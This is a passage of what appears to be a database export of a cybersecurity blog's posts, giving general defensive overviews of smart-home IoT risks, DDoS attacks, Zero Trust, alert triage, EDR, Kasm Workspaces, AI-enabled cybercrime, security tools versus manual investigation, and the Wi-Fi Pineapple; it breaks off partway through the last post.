(1, 'IoT and the Modern Home: How to Stay Safe in a Connected World', 'iot-and-the-modern-home-how-to-stay-safe-in-a-connected-world', '# The Reality of the Connected Home\n\nThe connected home is no longer a futuristic concept—it\'s a reality. From smart locks and thermostats to cameras and refrigerators, the Internet of Things (IoT) has transformed how we live, work, and interact with our environment. However, behind this convenience lies a growing threat: every connected device is a potential entry point for cyberattacks.\n\nToday\'s smart homeowner isn\'t just managing gadgets—they\'re managing risk. Understanding these risks is the first step toward securing what matters most.\n\n## The Rise (and Risk) of the Smart Home\n\nSmart homes promise simplicity: lights that learn daily routines, security systems that respond automatically, and voice assistants that anticipate needs. But the same connections that make life easier can also open digital doors to intruders.\n\nStudies show that up to 80% of consumer IoT devices contain known vulnerabilities, and attacks targeting smart homes increased by more than 100% year over year in 2024. Mass adoption has moved faster than security awareness and regulation.\n\n### Why IoT Devices Are So Vulnerable\n\nMost IoT devices are designed for affordability and convenience, not security. Common issues include default credentials, unpatched firmware, weak or missing encryption, and the lack of unified security standards.\n\nEven basic devices like smart plugs, TVs, and routers can become the weakest link. Once compromised, attackers can move laterally and gain control of the entire home network.\n\n### Real-World Threats from Compromised Devices\n\nSmart home breaches are real and damaging. 
Hackers have hijacked cameras and baby monitors, exposed private routines through energy data, recruited devices into botnets like Mirai, and permanently disabled hardware through malicious firmware.\n\nEvery connected device can act as both a helper and a hazard.\n\n## Convenience vs. Security\n\nMost users assume smart devices are secure by default, yet the majority report low confidence in IoT security. While many say they would pay more for safer devices, manufacturers still prioritize features and speed to market over security by design.\n\nAs a result, responsibility often falls on users who are least equipped to manage complex security risks.\n\n## How to Secure Your Smart Home\n\nSecuring a smart home does not require expert knowledge. Key steps include:\n\n- Changing default passwords\n- Keeping firmware updated\n- Segmenting IoT devices on separate networks\n- Using WPA3 encryption\n- Enabling multi-factor authentication\n- Choosing reputable manufacturers\n- Limiting unnecessary permissions\n\nSmall, consistent actions significantly reduce risk.\n\n## The Future of Smart Home Security\n\nAI-driven anomaly detection, zero-trust models, blockchain-based authentication, and quantum-resistant encryption are shaping the future of IoT security. Regulatory efforts like the EU Cyber Resilience Act, UK PSTI Act, and U.S. Cyber Trust Mark are improving accountability, while standards such as Matter and ETSI EN 303 645 aim to unify security practices.\n\nStill, education and awareness remain the strongest defense.\n\n## Security Is the True Smart Choice\n\nA connected home can be both convenient and secure, but only with intentional choices. From password hygiene to device selection, every decision impacts safety.\n\nSmart homes represent progress—but without cybersecurity awareness, progress quickly becomes exposure. 
Protecting your IoT ecosystem ensures your home remains smart in every sense of the word.', '', 'http://infoseclabs.io/uploads/1767472026759-342558123.jpeg', NULL, 1, 'published', '2026-01-03 07:21:00', '2026-01-03 23:27:20', 'IoT Security', 'Securing Your Connected Home: Risks & Solutions', 'Explore the risks of IoT in smart homes and learn effective measures to enhance your home\'s security.', 'smart home security'),
(2, 'Understanding DDoS Attacks: Protecting Your Digital Infrastructure', 'understanding-ddos-attacks-protecting-your-digital-infrastructure', '# Understanding Distributed Denial-of-Service (DDoS) Attacks\n\nDistributed Denial-of-Service (DDoS) attacks are among the most severe threats in today’s digital landscape. They can cripple businesses, disrupt critical infrastructure, and prevent users from accessing essential online services. Understanding how these attacks work, the tools attackers use, and how to mitigate them is essential for protecting digital assets.\n\nThis article explains the fundamentals of DDoS attacks, common attack types, attacker tools, and effective mitigation strategies. By the end, you will be able to recognize, respond to, and reduce the impact of DDoS attacks.\n\n## Introduction to DDoS Attacks\n\nA Distributed Denial-of-Service (DDoS) attack overwhelms a target, such as a website, server, or network, with massive traffic. This disrupts normal operations and makes services unavailable to legitimate users.\n\n## Types of DDoS Attacks\n\n### Volumetric Attacks\n\nThese attacks consume bandwidth by flooding the network with large volumes of traffic, blocking legitimate access.\n\n### Protocol Attacks\n\nThese exploit weaknesses in network protocols such as TCP (for example, through SYN floods) to exhaust server resources.\n\n### Application Layer Attacks\n\nThese target specific applications or services, overwhelming them with requests until they fail.\n\n## Impact of DDoS Attacks\n\nDDoS attacks can cause revenue loss, reputational damage, reduced user trust, and regulatory penalties. 
In 2020, AWS mitigated a record-breaking 2.3 Tbps DDoS attack, demonstrating the scale these attacks can reach.\n\n## Common DDoS Attack Methods\n\n### Volumetric Attacks\n\nExamples include UDP floods and DNS amplification attacks that generate massive traffic.\n\n### Protocol Attacks\n\nAttacks such as SYN floods and Ping of Death exploit protocol behavior to crash systems.\n\n### Application Layer Attacks\n\nAlso known as Layer 7 attacks, these include HTTP GET and POST floods targeting web services.\n\n## Tools Used in DDoS Attacks\n\n### Botnets\n\nNetworks of compromised devices controlled by attackers to generate large-scale traffic.\n\n### Stresser Services\n\nPaid services that allow users to launch DDoS attacks under the guise of stress testing.\n\n### Reflection Techniques\n\nAttackers use third-party servers to amplify traffic toward the victim.\n\n## Recognizing a DDoS Attack\n\nEarly detection reduces damage.\n\n### Common Symptoms\n\n- Slow or unavailable websites or services\n- Sudden traffic spikes from unusual locations\n- High network latency\n\n### Detection Methods\n\n- Traffic analysis\n- AI-based anomaly detection\n- Server log analysis\n\n## DDoS Mitigation Strategies\n\nAlthough prevention is difficult, the impact can be reduced.\n\n### Prevention Measures\n\n- Firewalls and intrusion prevention systems\n- Load balancers\n- Content delivery networks (CDNs)\n\n### Traffic Shaping\n\nPrioritizes legitimate traffic over malicious requests.\n\n## Real-World DDoS Case Studies\n\n### GitHub (2018)\n\nA 1.35 Tbps memcached amplification attack mitigated within minutes.\n\n### Dyn DNS (2016)\n\nA Mirai botnet attack disrupted major platforms such as Twitter and Netflix.\n\n### AWS (2020)\n\nA 2.3 Tbps attack highlighted the need for advanced mitigation systems.\n\n## Future Trends in DDoS Attacks\n\n### Increased IoT Exploitation\n\nMore vulnerable devices will expand botnet size.\n\n### AI-Driven Attacks\n\nAI may enable more adaptive and stealthy 
DDoS techniques.\n\n### Ransom DDoS (RDoS)\n\nAttackers demand payment to stop ongoing attacks.\n\n## Strengthen Your Security Today\n\nDDoS attacks continue to evolve and affect organizations of all sizes. By understanding attack methods, recognizing warning signs, and applying strong mitigation strategies, organizations can significantly reduce their exposure and impact.', '', 'http://infoseclabs.io/uploads/1767474329590-745685715.jpg', NULL, 1, 'published', '2026-01-03 16:01:00', '2026-01-04 00:05:43', 'Information Security', 'Understanding DDoS Attacks & Mitigation', 'Learn about DDoS attacks, methods, tools, and effective strategies to protect your digital assets from one of the biggest online threats.', 'DDoS Attacks'),
(3, 'Exploring Zero Trust: Why \'Trust but Verify\' is No Longer Enough', 'exploring-zero-trust-why-trust-but-verify-is-no-longer-enough', '# Understanding Zero Trust Architecture\n\nCybersecurity threats are becoming more sophisticated, and traditional perimeter-based security models are no longer sufficient. Zero Trust Architecture assumes that breaches can happen at any time and requires continuous verification. This shift has changed how organizations protect their digital assets.\n\nThis article explains Zero Trust Architecture, its core principles, implementation levels, and practical tools. It also uses the \"Security Onion\" analogy to simplify the concept.\n\n## Introduction to Zero Trust Architecture\n\nZero Trust is a security model where no user, device, or application is trusted by default, whether inside or outside the network. Every access request must be verified.\n\nIts importance lies in the principle of \"never trust, always verify.\" With cloud services, remote work, and mobile devices, Zero Trust provides layered protection across the entire infrastructure.\n\nTraditional models rely on a secure perimeter, granting broad access once inside. 
Zero Trust removes this assumption and enforces verification at every step, reducing both internal and external risks.\n\n## Core Principles of Zero Trust\n\n### Never Trust, Always Verify\n\nEvery request must be authenticated and validated before access is granted.\n\n### Least Privilege Access\n\nUsers receive only the access required to perform their tasks, minimizing exposure.\n\n### Assume Breach\n\nOrganizations operate as if a breach has already occurred, enabling continuous monitoring and rapid response.\n\n## Levels of Zero Trust Implementation\n\n### User Identity\n\nStrong identity verification using IAM solutions such as Okta or Microsoft Azure AD.\n\n### Devices and Endpoints\n\nAll devices are verified and monitored using endpoint security tools like CrowdStrike or SentinelOne.\n\n### Network\n\nMicrosegmentation limits lateral movement within the network using platforms such as Illumio or Cisco Secure Workload.\n\n### Applications\n\nApplications are protected with access controls and monitoring tools like Zscaler and Netskope.\n\n### Data\n\nData is secured through encryption, classification, and strict access controls.\n\n## Security Onion Analogy\n\nZero Trust can be visualized as layers of an onion. At the center are people, surrounded by layers including the perimeter, network, endpoints, data, and organizational policies. 
Each layer strengthens the next, creating a comprehensive defense model.\n\n## Tools and Technologies for Zero Trust\n\n- **Identity and Access Management (IAM)** solutions manage user identities.\n- **Multi-Factor Authentication (MFA)** strengthens authentication.\n- **Microsegmentation** limits network access.\n- **Endpoint Detection and Response (EDR)** provides visibility into device activity.\n\n## Implementing Zero Trust\n\n### Assessment\n\nIdentify assets, risks, and vulnerabilities.\n\n### Planning\n\nDefine a Zero Trust strategy and select appropriate tools.\n\n### Implementation\n\nDeploy controls gradually, starting with critical systems.\n\n### Monitoring\n\nContinuously monitor activity and automate responses.\n\n## Why Zero Trust Is the Future\n\nZero Trust Architecture is essential as cyber threats continue to evolve. It provides proactive, layered security and ensures continuous verification across all systems. Organizations that adopt Zero Trust improve resilience, reduce risk, and prepare for future challenges.', '', 'http://infoseclabs.io/uploads/1767474556038-82386573.png', NULL, 1, 'published', '2026-01-01 00:08:00', '2026-01-04 00:10:27', 'Information Security', 'Exploring Zero Trust: Secure Beyond \'Trust but Verify\'', 'Learn why Zero Trust surpasses \'Trust but Verify\' in cybersecurity, focusing on core principles and practical tools for robust security.', 'Zero Trust'),
(4, 'Overcoming Alarm Fatigue: How to Manage Security Alerts Effectively', 'overcoming-alarm-fatigue-how-to-manage-security-alerts-effectively', '# Mastering Security Alarm Management: A Guide to Effective Alert Triage\n\nWhen was the last time your security team investigated an alarm and discovered its actual cause? Security alarms are more than just annoying alerts; they are breadcrumbs along a trail left by potential attackers. Yet, too often, organizations fall prey to the \"cry wolf\" syndrome, becoming desensitized to alarms and missing signs of real danger.\n\nThe stakes couldn’t be higher. Responding to every alarm can overwhelm a team, but ignoring them completely could lead to disastrous consequences. This guide will walk you through the harsh reality of alert fatigue and provide actionable methods for effective triage to ensure you stay vigilant without drowning.\n\n## What is Alarm Fatigue?\n\nAlarm fatigue occurs when security analysts receive an overwhelming number of alarms, leading them to ignore or deprioritize notifications. When you are bombarded by 500 alerts a day, the 501st—the one that actually matters—can easily be lost in the noise.\n\n## The Harsh Reality of the SOC\n\n- **85% of security alerts are false positives**, according to research by the Ponemon Institute.\n- Analysts only investigate **56% of alerts** on average, leaving thousands of potential threats unaddressed.\n- **Burnout is real**: Over 70% of analysts with less than five years of experience face turnover risks due to the high-stress environment of unmanaged alerts.\n\n## A 5-Step Framework for Effective Alert Triage\n\nAs a new professional, you need a repeatable process. Don\'t just \"click through\" alerts—investigate them strategically.\n\n### 1. Smart Alert Grouping\n\nStop investigating alerts in isolation. Use your SIEM or SOAR to cluster related signals—such as multiple failed logins followed by a successful one from the same IP. 
This transforms \"noise\" into a \"story.\"\n\n### 2. Contextual Enrichment\n\nA raw alert (e.g., \"SQL Injection attempt\") is useless without context. Ask:\n\n- Is the target a critical production server or a test lab?\n- Does the server even run SQL? If not, it’s a low-priority false positive.\n- Is this the user\'s standard behavior or a sudden anomaly?\n\n### 3. Risk-Based Prioritization\n\nNot all alerts are equal. Use a scoring system that considers the criticality of the asset and the severity of the threat. Focus on level 1 (critical) threats first, and handle level 3 (low-priority) during regular business hours.\n\n### 4. Focused Investigation Path\n\nFollow defined Runbooks or Playbooks. For an authentication alert, your path should always include verifying MFA usage and checking IP reputation via tools like VirusTotal.\n\n### 5. The Feedback Loop (Tuning)\n\nThis is the most critical step for a new professional. If you identify a persistent false positive—like a nightly backup script triggering a \"mass file move\" alert—document it and work with your security engineers to tune the rule or set a suppression threshold.\n\n## Professional Advice for Your First 90 Days\n\n- **Automate the Mundane**: Use automation for repetitive tasks like IP lookups and indicator extraction so you can focus on human-centric analysis.\n- **Know Your Baseline**: You can\'t spot an outlier if you don\'t know what \"normal\" looks like in your specific network.\n- **Collaborate**: Don\'t be afraid to ask a senior analyst for a second opinion on complex alerts.\n\n## Conclusion\n\nIgnored alarms mean missed opportunities to stop an attack in its early stages. 
By implementing a structured triage framework and focusing on alert quality over quantity, you protect not only your organization but also your own professional longevity.', '', 'http://infoseclabs.io/uploads/1767481096256-421379954.jpg', NULL, 1, 'published', '2026-01-04 01:56:00', '2026-01-04 18:03:00', 'Information Security', 'Managing Security Alerts: Overcome Alarm Fatigue', 'Learn strategies to combat alarm fatigue and effectively manage security alerts, ensuring no threat goes undetected.', 'Alarm Fatigue'),
(5, 'Why Traditional Antivirus Falls Short in Today\'s Cybersecurity Landscape', '', '# The Evolution of Endpoint Protection: Beyond Traditional Antivirus\n\nCyberattacks are becoming increasingly sophisticated, targeting vulnerabilities with precision and speed. For years, traditional antivirus solutions have been the backbone of endpoint protection. However, as the cybersecurity landscape evolves, so do the tactics of attackers. Today, conventional antivirus software is struggling to keep pace with zero-day exploits and advanced threats. Enter Endpoint Detection and Response (EDR), the next line of defense and perhaps the future of endpoint security.\n\nIn this blog, we’ll explore why signature-based antivirus solutions fall short in combating modern threats and how EDR rises to the challenge with behavior-driven detection. By the end, you’ll understand why it may be time to upgrade your endpoint security strategy.\n\n## The Problem with Traditional Antivirus\n\nFor decades, antivirus software has relied heavily on signature-based detection. But what does that mean, and why is it no longer sufficient?\n\n### How Signature-Based Detection Works\n\nTraditional antivirus tools operate by detecting known patterns or \"signatures\" in malicious files. When a file matches a database of suspicious signatures, it gets flagged and quarantined. This strategy worked exceptionally well in an era when malware evolved slowly, and attacks were less sophisticated.\n\nHowever, modern threats have outgrown this method. 
Here’s why signature-based detection is falling behind:\n\n- **Zero-Day Exploits:** Cybercriminals exploit vulnerabilities that vendors are unaware of, making signature databases irrelevant in the face of these unknown threats.\n  \n- **Polymorphic Malware:** Modern malware can modify its code to avoid detection, rendering signatures ineffective.\n  \n- **Sophisticated Attacks:** Hackers now use complex, multi-vector attacks that traditional antivirus cannot analyze comprehensively.\n\nThe result? Relying purely on antivirus creates significant blind spots in your security strategy, leaving your organization vulnerable to evolving threats.', '', 'http://infoseclabs.io/uploads/1767482620674-705801876.png', NULL, 1, 'published', '2025-12-30 10:18:00', '2026-01-04 18:18:06', 'Information Security', 'Overcoming Alert Overload in Cybersecurity', 'Discover how EDR surpasses traditional antivirus in tackling modern cyber threats. Upgrade your security strategy today.', 'Endpoint Protection'),
(6, 'Elevate Your Cybersecurity Skills with Kasm Workspaces: A Comprehensive Guide', 'elevate-your-cybersecurity-skills-with-kasm-workspaces-a-comprehensive-guide', '# Kasm Workspaces for Cybersecurity Professionals\n\nThe world of cybersecurity is vast, continuously evolving, and demanding. Whether you\'re a seasoned professional or a budding enthusiast, having the right tools can be a game-changer. One such tool that\'s been making waves in the cybersecurity community is Kasm Workspaces. But what exactly is it, and how can you incorporate it into your home lab to enhance your skills and security? This blog will answer these questions and guide you through using Kasm Workspaces as a cybersecurity professional.\n\n## What is Kasm Workspaces?\n\n### Overview of Kasm Workspaces\n\nKasm Workspaces is a modern, container-based virtual desktop infrastructure (VDI) platform designed to create isolated environments for safe browsing, application deployment, remote work, and more. Unlike traditional VDIs, Kasm Workspaces utilizes lightweight containers, such as Docker, to provide scalable and secure access to virtualized environments.\n\nWhether you need to run a browser in a sandboxed environment, analyze suspicious files isolated from your main machine, or simply access a secure workspace remotely, Kasm Workspaces offers a robust and efficient solution.\n\n### Benefits for Cybersecurity Professionals\n\nFor cybersecurity professionals, Kasm Workspaces checks several critical boxes:\n\n- **Secure Environments:** Create isolated containers to analyze threats, execute potentially malicious files, or browse the web securely without risk to host machines.\n\n- **Lightweight and Scalable:** Unlike resource-heavy VMs, Kasm Workspaces\' containerized approach provides flexibility without high hardware requirements.\n\n- **Centralized Management:** Manage multiple workspaces, configurations, and users from a single dashboard effortlessly.', '', 
'http://infoseclabs.io/uploads/1767482767599-980252455.png', NULL, 1, 'published', '2026-01-03 02:26:00', '2026-01-05 00:33:14', 'Projects', 'Kasm Workspaces: Setup Guide for Cybersecurity Pros', 'Discover how Kasm Workspaces enhances cybersecurity home labs with secure, scalable, containerized environments.', 'Kasm Workspaces'),
(7, 'The Rise of AI in Cybercrime: Understanding the Threats and Defenses', 'the-rise-of-ai-in-cybercrime-understanding-the-threats-and-defenses', '# The New Frontier: AI-Powered Cyberattacks\n\nThe rapid advancements in artificial intelligence (AI) have revolutionized industries by streamlining processes and creating new opportunities. However, along with its many benefits, AI has also opened a new frontier for cybercriminals. Hackers increasingly leverage machine learning and AI tools to enhance their cyberattacks, making them more sophisticated, effective, and harder to detect.\n\nThis blog delves into how AI is reshaping the cyberattack landscape, provides real-world examples, and offers actionable strategies to defend against this growing threat. If you\'re concerned about how AI is influencing cybersecurity, you\'re in the right place.\n\n## How AI Enhances Cyberattacks\n\nAI adds a dangerous layer of automation, precision, and deception to cyberattacks. Here are some ways hackers are weaponizing machine learning to exploit vulnerabilities.\n\n### Automated Vulnerability Detection\n\nHackers often need to identify weaknesses in a system to stage their attacks. Traditional methods of scanning for vulnerabilities are manual and time-consuming. However, with AI, cybercriminals can now automate this process, allowing them to find weak points in networks, software, or applications much faster.\n\nAI-powered tools analyze large datasets to identify exploitable vulnerabilities and leverage predictive analytics to determine the likelihood of specific attacks succeeding, helping hackers optimize their targets effectively.\n\nFor example, AI can detect unpatched software versions, misconfigured firewalls, or even analyze encryption keys to uncover weaknesses. 
This automation enables attackers to plot cyberattacks on a scale never seen before.\n\n### Advanced Phishing Campaigns\n\nPhishing, a form of cyberattack where hackers pretend to be legitimate entities to trick users into revealing sensitive information, has been around for years. However, AI has supercharged phishing schemes to become more indistinguishable from real correspondence.\n\nMachine learning enables cybercriminals to create hyper-personalized phishing messages by analyzing social media profiles, email conversations, and public records. AI can craft well-written, contextually appropriate emails that users are far more likely to click on, making these phishing attempts nearly impossible to detect using traditional filters.\n\nAccording to recent studies, 91% of all cyberattacks begin with a phishing email. Now, AI is increasing both the sophistication and authenticity of these scams, putting organizations at greater risk.\n\n### Evasive Malware and Polymorphism\n\nOne of the most dangerous aspects of AI in cyberattacks is the creation of evasive malware. AI-powered malware continuously reconfigures itself to evade detection by security software.\n\nPolymorphic malware, for instance, uses AI to generate new versions of itself with minor variations in its code. These changes render detection tools like signature-based antiviruses obsolete because they cannot recognize new iterations.\n\nWhat\'s worse, AI-powered malware can actively \"learn\" from its environment, adapting its behavior in real-time to avoid detection. It can analyze which types of actions trigger alerts and modify its activity accordingly, ensuring it stays under the radar longer.\n\n## Real-World Examples of AI-Powered Attacks\n\nAI-powered cyberattacks are no longer just hypothetical. They have already made their mark in the real world, with several alarming examples surfacing in recent years.\n\n1. 
**Deepfake Impersonation Scams**  \n   Hackers have used AI-generated deepfake audio to impersonate company executives. For instance, in 2019, cybercriminals used deepfake technology to mimic the voice of a CEO, convincing an employee to transfer $243,000 to a fraudulent bank account.\n\n2. **AI-Enhanced Credential Stuffing**  \n   Credential stuffing involves hackers attempting to gain access by leveraging usernames and passwords leaked from previous data breaches. AI can enhance these attacks by using machine learning to test stolen credentials across hundreds of platforms, identifying successful logins faster than human hackers could.\n\n3. **Sophisticated Chatbot Scams**  \n   Malicious chatbots powered by AI have been deployed to scam unsuspecting users. These bots can impersonate company representatives, tricking users into providing sensitive information or downloading harmful files.\n\nThese examples demonstrate the deadly potential of AI in the hands of hackers. But what can organizations do to defend themselves?\n\n## Defending Against AI Cyberattacks\n\nWhile the rise of AI-powered cyberattacks is alarming, the good news is that AI is also a powerful ally in cybersecurity. Here’s how organizations can leverage AI to stay one step ahead of attackers.\n\n### AI-Driven Threat Detection Systems\n\nSecurity systems powered by AI are vital in detecting and stopping advanced threats. These systems can process and analyze vast amounts of data in real-time, uncovering patterns or anomalies that traditional tools might miss.\n\nFor example, AI systems like CrowdStrike and Darktrace continuously monitor network traffic for suspicious activity. 
When a system behaves unusually, such as a sudden spike in outbound data transfers, these tools can flag it and take automated actions to mitigate threats.\n\nAdditionally, AI can provide early warnings about potential attacks by analyzing global cybersecurity trends, enabling organizations to prepare proactive defenses.\n\n### Behavioral Analysis and Anomaly Detection\n\nTraditional cybersecurity methods often rely on static rules, making them susceptible to dynamic threats like AI-powered polymorphic malware. AI solves this problem through behavioral analysis and anomaly detection.\n\nInstead of focusing only on known threat signatures, AI tools observe normal patterns of behavior within a system. Any deviation from the norm triggers alerts, even if the activity doesn’t match a known attack signature.\n\nFor example, if malware disguised as a legitimate application suddenly starts accessing sensitive files, an AI-based security system would flag this as suspicious and isolate the application before any damage is done.\n\n### Proactive Security Measures and Threat Intelligence\n\nThe key to defending against AI-powered cyberattacks is staying ahead of evolving threats. Organizations need to adopt proactive measures like penetration testing, threat simulations, and regular software updates.\n\nThreat intelligence platforms powered by AI can help businesses identify vulnerabilities before hackers do. These platforms scour the dark web, stay updated on newly discovered exploits, and provide actionable recommendations for patching weak spots.\n\nBy continuously improving their defenses and staying informed about emerging threats, businesses can significantly minimize the risks posed by AI-enhanced cyberattacks.\n\n## The Future of Cybersecurity in the Age of AI\n\nAI is rapidly transforming cybersecurity from both an offensive and defensive standpoint. 
While hackers will continue to exploit AI to create sophisticated cyberattacks, the same technology offers powerful solutions to thwart them.\n\nThe best way forward is for businesses and organizations to adopt AI-driven cybersecurity tools, invest in advanced threat intelligence systems, and remain vigilant in updating their defenses. When used responsibly, AI isn’t just a challenge to overcome; it’s the key to staying ahead in an increasingly complex digital world.\n\nTo safeguard your organization against AI-powered cyber threats, start exploring AI-driven cybersecurity solutions today. The future of digital safety depends on your readiness to adapt and protect.', '', 'http://infoseclabs.io/uploads/1767499156712-998648028.png', NULL, 1, 'published', '2026-01-07 02:58:00', '2026-01-07 18:18:38', 'Information Security', 'AI-Powered Cyberattacks: Hackers & Machine Learning', 'Discover how AI is transforming cyberattacks and learn strategies to protect against these sophisticated threats.', 'AI cyberattacks'),
(8, 'Security Tools vs. Manual Investigation: Building a Balanced Cybersecurity Professional', 'security-tools-vs-manual-investigation-building-a-balanced-cybersecurity-professional', '# Balancing Tools and Manual Skills in Cybersecurity\n\nCybersecurity is one of the most dynamic fields in the modern workforce, where threats evolve as quickly as the technology designed to counter them. This creates a significant challenge for cybersecurity professionals to continuously refine their skills and adapt to new methodologies. A long-standing debate in the field centers around whether professionals should focus on mastering security tools or prioritize honing their manual investigation skills.\n\nThe truth is, to become a well-rounded cybersecurity professional, it\'s not about choosing between the two but striking the right balance. This blog will explore the strengths and limitations of relying on tools, the irreplaceable value of manual investigation, and how blending these approaches can prepare you to thrive in this fast-paced field.\n\n## The Role of Security Tools in Cybersecurity\n\nSecurity tools are indispensable for automating complex tasks, ensuring faster detection and response, and providing organizations with a robust line of defense. Today\'s advanced tools have revolutionized cybersecurity by adding scalability, speed, and near real-time insights.\n\n### Key Tools Empowering Cybersecurity Professionals\n\n1. **Security Information and Event Management (SIEM):** SIEM tools such as Splunk and IBM QRadar analyze logs and events across an organization\'s IT environment, providing centralized visibility over network activity.\n2. **Intrusion Detection and Prevention Systems (IDS/IPS):** Tools like Snort and Suricata scan for suspicious traffic patterns to prevent network intrusions.\n3. **Vulnerability Scanners:** Solutions like Nessus and Rapid7 Nexpose identify weak points in your network that attackers might exploit.\n4. 
**Endpoint Detection and Response (EDR):** Tools like CrowdStrike and SentinelOne monitor endpoint behavior to detect anomalies and prevent breaches.\n\n### Benefits of Security Tools\n\nSecurity tools bring speed and efficiency to tasks that would take hours or even days if performed manually. They excel at:\n\n- **Threat Detection:** Automating the detection of malware or unusual activity, greatly reducing response times.\n- **Log Management:** Consolidating log data from multiple sources for easier monitoring.\n- **Reducing Errors:** Tools minimize human errors by providing consistent, algorithm-based processes.\n- **Scalability:** Tools handle large datasets and adapt to growing organizations with minimal additional labor.\n\nHowever, as powerful as these tools are, their limitations mean they can\'t be the sole focus for cybersecurity professionals.\n\n## The Importance of Manual Investigation Skills\n\nSecurity tools cannot replace the expertise, critical thinking, and intuition of a human investigator. Their reliance on predefined rules and algorithms makes them vulnerable to bypasses, misconfiguration, or outright failures.\n\n### Core Manual Investigation Techniques\n\n1. **Log Analysis:** Reviewing raw data from logs can uncover nuanced patterns and anomalies that automated tools may miss.\n2. **Network Traffic Analysis:** Manually inspecting network packets with tools like Wireshark helps you understand intricate details about suspicious traffic.\n3. **Malware Analysis:** Analyzing malicious files through static and dynamic means (e.g., decompiling code or sandbox testing) can help determine their capabilities and origins.\n4. 
**Behavioral Analysis:** Looking for deviations from expected behavior within user or system interactions often requires human insight.\n\n### Why Manual Skills Matter\n\n- **Complex Threats:** Cyberattacks are becoming increasingly sophisticated, and manual analysis is often required to understand advanced tactics, techniques, and procedures (TTPs).\n- **False Positives:** Over-reliance on tools can lead to missed legitimate activity being misclassified as malicious or vice versa. Human judgment is vital for distinguishing between the two.\n- **Incident Response:** When tools fail or are rendered inoperable by attackers, skilled cybersecurity professionals step in to contain, investigate, and resolve issues.\n\nBy investing in manual skills, professionals not only enhance their problem-solving capabilities but also ensure that their expertise remains irreplaceable.\n\n## Striking a Balance Between Tools and Manual Expertise\n\nThe ultimate goal for cybersecurity professionals is not about choosing one approach over the other but knowing when and how to combine both effectively. Here\'s why a blended approach works best:\n\n- **Efficiency with Tools:** Tools save time by automating repetitive tasks, letting professionals focus their manual expertise on more intricate issues.\n- **Human Judgment as a Safety Net:** Professionals must validate and interpret the data generated by tools to avoid decision-making based on incomplete or misleading information.\n- **Incident Adaptability:** While tools operate by predefined rules, humans can creatively adapt to situations.\n\nBy using security tools as extensions of their own ability—not replacements for it—professionals can maximize their impact.\n\n## Incident Response Scenario\n\nImagine this scenario: Your Security Information and Event Management (SIEM) system, which usually alerts your team of potential intrusions, has failed due to a technical error. 
At the same time, one of your endpoints begins acting suspiciously, potentially signaling a breach. What do you do?\n\n**Step 1 – Activate the Incident Response Plan:**\n\nInitiate the pre-established incident response plan (IRP). Begin by identifying the team members who need to be involved and delegating tasks to ensure a structured approach.\n\n**Step 2 – Collect Logs and Evidence:**\n\nSince the SIEM system is down, manually retrieve event logs from key systems (e.g., network firewalls, servers, and endpoint devices). Verify any discrepancies or unusual activity.\n\n**Step 3 – Conduct a Manual Investigation:**\n\nUse tools like Wireshark to manually analyze network traffic from suspicious endpoints. Perform behavioral analysis to identify patterns of attack.\n\n**Step 4 – Contain and Mitigate:**\n\nIsolate impacted systems from your network to prevent escalation. Apply containment measures, such as endpoint quarantine or restricting user permissions.\n\n**Step 5 – Eradication and Recovery:**\n\nRemove the threat manually by using advanced techniques like malware removal tools or system rollbacks. Restore all systems to their functional state and monitor them for lingering threats.\n\nThis scenario highlights how security tools provide convenience but how manual investigation remains critical when tools fail.\n\n## Best Practices for Professional Development\n\nTo become an effective cybersecurity professional capable of balancing tools and manual skills, consider the following:\n\n- **Certifications and Training:**', '', 'http://infoseclabs.io/uploads/1767499299723-760685997.png', NULL, 1, 'published', '2026-01-09 03:01:00', '2026-01-13 01:08:54', 'Information Security', 'Security Tools vs. Manual Skills: Cybersecurity Balance', 'Discover how to balance security tools and manual investigation skills for a comprehensive cybersecurity approach.', 'Cybersecurity Balance'),
(9, 'Wi-Fi Pineapple: A Comprehensive Guide to Network Security and Threat Prevention', 'wi-fi-pineapple-a-comprehensive-guide-to-network-security-and-threat-prevention', '# Understanding Wi-Fi Pineapple: A Cybersecurity Perspective\n\nWhen you hear the term \"Wi-Fi Pineapple,\" you might picture a tropical fruit connected to your network. However, in the cybersecurity world, this device is far from sweet. Wi-Fi Pineapples are powerful tools designed for network auditing, but in the wrong hands, they can be used for malicious purposes.\n\nThis blog will break down what a Wi-Fi Pineapple is, how it works (with a focus on MITM attacks), real-world scenarios where these devices have been exploited, and effective security measures to protect yourself. By the end, you\'ll have a deeper understanding of this tool and how to stay one step ahead of potential attackers.\n\n## What Is a Wi-Fi Pineapple?\n\nA Wi-Fi Pineapple is a device created by Hak5, a company known for its ethical hacking training tools. Originally built to assist network administrators and penetration testers, the Pineapple allows users to monitor, analyze, and test wireless networks.\n\nEssentially, it acts as a device that can simulate rogue Wi-Fi networks and mimic legitimate access points (APs). It can capture data, intercept information, and probe vulnerabilities in a network’s security framework. While its ethical use is significant in network auditing and cybersecurity testing, these devices can also be exploited by hackers for nefarious purposes.\n\n## How Wi-Fi Pineapple Works: Man-in-the-Middle (MITM) Attacks Explained\n\nOne of the most dangerous features of the Wi-Fi Pineapple is its ability to facilitate a **man-in-the-middle (MITM) attack** seamlessly. Here’s how it works:\n\n### Step 1: Mimicking Legitimate Wi-Fi Networks\n\nWi-Fi Pineapples scan the area for Wi-Fi AP names and automatically respond to connection requests. 
Many unsuspecting devices, such as laptops and smartphones, are programmed to automatically reconnect to familiar Wi-Fi names (e.g., \"Starbucks_Free_WiFi\"). The Pineapple responds as the “strongest” signal impersonating that AP.\n\n### Step 2: Capturing Data\n\nWhen a victim connects to the Pineapple, their internet traffic can be intercepted. Attackers can collect sensitive data such as login credentials, session cookies, and even browsing activity.\n\n### Step 3: Deploying Attacks\n\nDuring MITM attacks, bad actors can:\n\n- Redirect users to malicious websites to steal information.\n- Inject malware into HTTP traffic.\n- Uncover intricate details of unencrypted connections.\n\nThe result? Your personal and professional data is captured without your knowledge, and in unsecured networks, this risk skyrockets.\n\n## Different Wi-Fi Pineapple Models and Their Features\n\nHak5 currently offers several models of Wi-Fi Pineapple devices, catering to both beginner and advanced users. Below are the most popular models:\n\n### 1. Wi-Fi Pineapple Nano\n\n- Portable yet powerful\n- Best for on-the-go network assessments\n- Budget-friendly, making it accessible to beginners\n\n### 2. Wi-Fi Pineapple Tetra\n\n- Dual radio capabilities\n- Handles multiple wireless clients simultaneously\n- Perfect for advanced penetration testing setups\n\n### 3. Enterprise Solutions\n\n- High-level auditing programs customized for corporate needs\n- More security and control for ethical usage\n\nEach model includes rich features like packet sniffing, victim profiling, and additional plugins to enhance adaptability. However, these tools also make them dangerous if exploited.\n\n## Real-World Scenarios of Pineapple 